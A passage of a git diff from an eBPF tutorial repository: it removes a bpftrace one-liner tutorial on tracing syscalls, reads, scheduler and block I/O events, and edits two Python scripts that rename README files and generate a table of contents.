'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }' -Attaching 1 probe... -snmp-pass /proc/cpuinfo -snmp-pass /proc/stat -snmpd /proc/net/dev -snmpd /proc/net/if_inet6 -^C -``` - -This traces file opens as they happen, and we're printing the process name and pathname. - -- It begins with the probe `tracepoint:syscalls:sys_enter_openat`: this is the tracepoint probe type (kernel static tracing), and is instrumenting when the `openat()` syscall begins (is entered). Tracepoints are preferred over kprobes (kernel dynamic tracing, introduced in lesson 6), since tracepoints have stable API. Note: In modern Linux systems (glibc >= 2.26) the `open` wrapper always calls the `openat` syscall. -- `comm` is a builtin variable that has the current process's name. Other similar builtins include pid and tid. -- `args` is a struct containing all the tracepoint arguments. This -struct is automatically generated by bpftrace based tracepoint information. The -members of this struct can be found with: `bpftrace -vl tracepoint:syscalls:sys_enter_openat`. -- `args.filename` accesses the `args` struct and gets the value of the - `filename` member. -- `str()` turns a pointer into the string it points to. - -# Lesson 4. Syscall Counts By Process - -``` -bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' -Attaching 1 probe... -^C - -@[bpftrace]: 6 -@[systemd]: 24 -@[snmp-pass]: 96 -@[sshd]: 125 -``` - -This summarizes syscalls by process name, printing a report on Ctrl-C. - -- @: This denotes a special variable type called a map, which can store and summarize data in different ways. You can add an optional variable name after the @, eg "@num", either to improve readability, or to differentiate between more than one map. -- []: The optional brackets allow a key to be set for the map, much like an associative array. -- count(): This is a map function – the way it is populated. count() counts the number of times it is called. Since this is saved by comm, the result is a frequency count of system calls by process name. - -Maps are automatically printed when bpftrace ends (eg, via Ctrl-C). - -# Lesson 5. Distribution of read() Bytes - -``` -# bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }' -Attaching 1 probe... -^C - -@bytes: -[0, 1] 12 |@@@@@@@@@@@@@@@@@@@@ | -[2, 4) 18 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 30 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[64, 128) 19 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[128, 256) 1 |@ -``` - -This summarizes the return value of the sys_read() kernel function for PID 18644, printing it as a histogram. - -- /.../: This is a filter (aka predicate), which acts as a filter for the action. The action is only executed if the filtered expression is true, in this case, only for the process ID 18644. Boolean operators are supported ("&&", "||"). -- ret: This is the return value of the function. For sys_read(), this is either -1 (error) or the number of bytes successfully read. -- @: This is a map similar to the previous lesson, but without any keys ([]) this time, and the name "bytes" which decorates the output. -- hist(): This is a map function which summarizes the argument as a power-of-2 histogram. The output shows rows that begin with interval notation, where, for example `[128, 256)` means that the value is: 128 <= value < 256. The next number is the count of occurrences, and then an ASCII histogram is printed to visualize that count. The histogram can be used to study multi-modal distributions. -- Other map functions include lhist() (linear hist), count(), sum(), avg(), min(), and max(). - -# Lesson 6. Kernel Dynamic Tracing of read() Bytes - -``` -# bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }' -Attaching 1 probe... -^C - -@bytes: -(...,0] 0 | | -[0, 200) 66 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[200, 400) 2 |@ | -[400, 600) 3 |@@ | -[600, 800) 0 | | -[800, 1000) 5 |@@@ | -[1000, 1200) 0 | | -[1200, 1400) 0 | | -[1400, 1600) 0 | | -[1600, 1800) 0 | | -[1800, 2000) 0 | | -[2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -``` - -Summarize read() bytes as a linear histogram, and traced using kernel dynamic tracing. - -- It begins with the probe `kretprobe:vfs_read`: this is the kretprobe probe type (kernel dynamic tracing of function returns) instrumenting the `vfs_read()` kernel function. There is also the kprobe probe type (shown in the next lesson), to instrument when functions begin execution (are entered). These are powerful probe types, letting you trace tens of thousands of different kernel functions. However, these are "unstable" probe types: since they can trace any kernel function, there is no guarantee that your kprobe/kretprobe will work between kernel versions, as the function names, arguments, return values, and roles may change. Also, since it is tracing the raw kernel, you'll need to browse the kernel source to understand what these probes, arguments, and return values, mean. -- lhist(): this is a linear histogram, where the arguments are: value, min, max, step. The first argument (`retval`) of vfs_read() is the return value: the number of bytes read. - -# Lesson 7. Timing read()s - -``` -# bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }' -Attaching 2 probes... - -[...] -@ns[snmp-pass]: -[0, 1] 0 | | -[2, 4) 0 | | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 0 | | -[64, 128) 0 | | -[128, 256) 0 | | -[256, 512) 27 |@@@@@@@@@ | -[512, 1k) 125 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | -[1k, 2k) 22 |@@@@@@@ | -[2k, 4k) 1 | | -[4k, 8k) 10 |@@@ | -[8k, 16k) 1 | | -[16k, 32k) 3 |@ | -[32k, 64k) 144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[64k, 128k) 7 |@@ | -[128k, 256k) 28 |@@@@@@@@@@ | -[256k, 512k) 2 | | -[512k, 1M) 3 |@ | -[1M, 2M) 1 | | -``` - -Summarize the time spent in read(), in nanoseconds, as a histogram, by process name. - -- @start[tid]: This uses the thread ID as a key. There may be many reads in-flight, and we want to store a start timestamp to each. How? We could construct a unique identifier for each read, and use that as the key. But because kernel threads can only be executing one syscall at a time, we can use the thread ID as the unique identifier, as each thread cannot be executing more than one. -- nsecs: Nanoseconds since boot. This is a high resolution timestamp counter than can be used to time events. -- /@start[tid]/: This filter checks that the start time was seen and recorded. Without this filter, this program may be launched during a read and only catch the end, resulting in a time calculation of now - zero, instead of now - start. - -- delete(@start[tid]): this frees the variable. - -# Lesson 8. Count Process-Level Events - -``` -# bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }' -Attaching 25 probes... -@[tracepoint:sched:sched_wakeup_new]: 1 -@[tracepoint:sched:sched_process_fork]: 1 -@[tracepoint:sched:sched_process_exec]: 1 -@[tracepoint:sched:sched_process_exit]: 1 -@[tracepoint:sched:sched_process_free]: 2 -@[tracepoint:sched:sched_process_wait]: 7 -@[tracepoint:sched:sched_wake_idle_without_ipi]: 53 -@[tracepoint:sched:sched_stat_runtime]: 212 -@[tracepoint:sched:sched_wakeup]: 253 -@[tracepoint:sched:sched_waking]: 253 -@[tracepoint:sched:sched_switch]: 510 -``` - -Count process-level events for five seconds, printing a summary. - -- sched: The `sched` probe category has high-level scheduler and process events, such as fork, exec, and context switch. -- probe: The full name of the probe. -- interval:s:5: This is a probe that fires once every 5 seconds, on one CPU only. It is used for creating script-level intervals or timeouts. -- exit(): This exits bpftrace. - -# Lesson 9. Profile On-CPU Kernel Stacks - -``` -# bpftrace -e 'profile:hz:99 { @[kstack] = count(); }' -Attaching 1 probe... -^C - -[...] -@[ -filemap_map_pages+181 -__handle_mm_fault+2905 -handle_mm_fault+250 -__do_page_fault+599 -async_page_fault+69 -]: 12 -[...] -@[ -cpuidle_enter_state+164 -do_idle+390 -cpu_startup_entry+111 -start_secondary+423 -secondary_startup_64+165 -]: 22122 -``` - -Profile kernel stacks at 99 Hertz, printing a frequency count. - -- profile:hz:99: This fires on all CPUs at 99 Hertz. Why 99 and not 100 or 1000? We want frequent enough to catch both the big and small picture of execution, but not too frequent as to perturb performance. 100 Hertz is enough. But we don't want 100 exactly, as sampling may occur in lockstep with other timed activities, hence 99. -- kstack: Returns the kernel stack trace. This is used as a key for the map, so that it can be frequency counted. The output of this is ideal to be visualized as a flame graph. There is also `ustack` for the user-level stack trace. - -# Lesson 10. Scheduler Tracing - -``` -# bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }' -^C -[...] - -@[ -__schedule+697 -__schedule+697 -schedule+50 -schedule_timeout+365 -xfsaild+274 -kthread+248 -ret_from_fork+53 -]: 73 -@[ -__schedule+697 -__schedule+697 -schedule_idle+40 -do_idle+356 -cpu_startup_entry+111 -start_secondary+423 -secondary_startup_64+165 -]: 305 -``` - -This counts stack traces that led to context switching (off-CPU) events. The above output has been truncated to show the last two only. - -- sched: The sched category has tracepoints for different kernel CPU scheduler events: sched_switch, sched_wakeup, sched_migrate_task, etc. -- sched_switch: This probe fires when a thread leaves CPU. This will be a blocking event: eg, waiting on I/O, a timer, paging/swapping, or a lock. -- kstack: A kernel stack trace. -- sched_switch fires in thread context, so that the stack refers to the thread who is leaving. As you use other probe types, pay attention to context, as comm, pid, kstack, etc, may not refer to the target of the probe. - -# Lesson 11. Block I/O Tracing - -``` -# bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' -Attaching 1 probe... -^C - -@: -[0, 1] 1 |@@ | -[2, 4) 0 | | -[4, 8) 0 | | -[8, 16) 0 | | -[16, 32) 0 | | -[32, 64) 0 | | -[64, 128) 0 | | -[128, 256) 0 | | -[256, 512) 0 | | -[512, 1K) 0 | | -[1K, 2K) 0 | | -[2K, 4K) 0 | | -[4K, 8K) 24 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| -[8K, 16K) 2 |@@@@ | -[16K, 32K) 6 |@@@@@@@@@@@@@ | -[32K, 64K) 5 |@@@@@@@@@@ | -[64K, 128K) 0 | | -[128K, 256K) 1 |@@ | - -``` - -Block I/O requests by size in bytes, as a histogram. - -- tracepoint:block: The block category of tracepoints traces various block I/O (storage) events. -- block_rq_issue: This fires when an I/O is issued to the device. -- args.bytes: This is a member from the tracepoint block_rq_issue arguments which shows the size in bytes. - -The context of this probe is important: this fires when the I/O is issued to the device. This often happens in process context, where builtins like comm will show you the process name, but it can also happen from kernel context (eg, readahead) when the pid and comm will not show the application you expect. - -# Lesson 12. Kernel Struct Tracing - -``` -# cat path.bt -#ifndef BPFTRACE_HAVE_BTF -#include -#include -#endif - -kprobe:vfs_open -{ - printf("open path: %s\n", str(((struct path *)arg0)->dentry->d_name.name)); -} - -# bpftrace path.bt -Attaching 1 probe... -open path: dev -open path: if_inet6 -open path: retrans_time_ms -[...] -``` - -This uses kernel dynamic tracing of the vfs_open() function, which has a (struct path *) as the first argument. - -- kprobe: As mentioned earlier, this is the kernel dynamic tracing probe type, which traces the entry of kernel functions (use kretprobe to trace their returns). -- `arg0` is a builtin variable containing the first probe argument, the meaning of which is defined by the probe type. For `kprobe`, it is the first argument to the function. Other arguments can be accessed as arg1, ..., argN. -- `((struct path *)arg0)->dentry->d_name.name`: this casts `arg0` as `struct path *`, then dereferences dentry, etc. -- #include: these are necessary to include struct definitions for path and dentry on systems where the kernel was built without BTF (BPF Type Format) data. - -The kernel struct support is the same as bcc, making use of kernel headers. This means that many structs are available, but not everything, and sometimes it might be necessary to manually include a struct. For an example of this, see the [dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt), which includes a portion of struct nameidata manually as it wasn't in the available headers. If the kernel has BTF data, all kernel structs are always available. - -At this point you understand much of bpftrace, and can begin to use and write powerful one-liners. See the [Reference Guide](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md) for more capabilities. - -> The original tutorial link: https://github.com/iovisor/bpftrace/blob/master/docs/ diff --git a/src/scripts/generate_toc.py b/src/scripts/generate_toc.py index 55c4601..6f0435f 100644 --- a/src/scripts/generate_toc.py +++ b/src/scripts/generate_toc.py @@ -34,7 +34,7 @@ def generate_toc(base_dir, project_root): for directory in all_dirs: lesson_path = os.path.join(base_dir, directory) config_path = os.path.join(lesson_path, ".config") - readme_path = os.path.join(lesson_path, "README_en.md") + readme_path = os.path.join(lesson_path, "README.md") if os.path.exists(config_path) and os.path.exists(readme_path): # Read the .config file for 'level', 'type', and 'desc' @@ -139,7 +139,7 @@ def generate_toc_cn(base_dir, project_root): for directory in all_dirs: lesson_path = os.path.join(base_dir, directory) config_path = os.path.join(lesson_path, ".config") - readme_path = os.path.join(lesson_path, "README.md") + readme_path = os.path.join(lesson_path, "README.zh.md") if os.path.exists(config_path) and os.path.exists(readme_path): # Read the .config file for 'level', 'type', and 'desc' @@ -213,7 +213,7 @@ def generate_toc_cn(base_dir, project_root): # Example usage base_directory = "/root/bpf-developer-tutorial/src/" # Replace with the actual base directory project_root = "/root/bpf-developer-tutorial/src/" # The root of the project -toc_output = generate_toc(base_directory, project_root) - +# toc_output = generate_toc(base_directory, project_root) +toc_output = generate_toc_cn(base_directory, project_root) # Output the TOC print(toc_output) diff --git a/src/scripts/rename.py b/src/scripts/rename.py index bcaee0c..981df46 100644 --- a/src/scripts/rename.py +++ b/src/scripts/rename.py @@ -1,23 +1,34 @@ import os -def rename_readme_files(base_dir): - # Walk through all directories and files starting from base_dir +def rename_readme_en_to_readme(base_dir): + # First pass: Rename README_en.md to README.md for root, dirs, files in os.walk(base_dir): for file in files: file_path = os.path.join(root, file) - # Rename README.md to README.zh.md if README.md exists after the previous rename + # Rename README_en.md to README.md + if file == "README_en.md": + new_file_path = os.path.join(root, "README.md") + os.rename(file_path, new_file_path) + print(f"Renamed {file_path} to {new_file_path}") + +def rename_readme_to_readme_zh(base_dir): + # Second pass: Rename README.md to README.zh.md + for root, dirs, files in os.walk(base_dir): + for file in files: + file_path = os.path.join(root, file) + + # Rename README.md to README.zh.md if it exists if file == "README.md": zh_file_path = os.path.join(root, "README.zh.md") os.rename(file_path, zh_file_path) print(f"Renamed {file_path} to {zh_file_path}") - # Rename README_en.md to README.md - elif file == "README_en.md": - new_file_path = os.path.join(root, "README.md") - os.rename(file_path, new_file_path) - print(f"Renamed {file_path} to {new_file_path}") - # Example usage base_directory = "/root/bpf-developer-tutorial/src" # Replace with the actual base directory -rename_readme_files(base_directory) + +# Second pass: Rename README.md to README.zh.md +rename_readme_to_readme_zh(base_directory) + +# First pass: Rename README_en.md to README.md +rename_readme_en_to_readme(base_directory)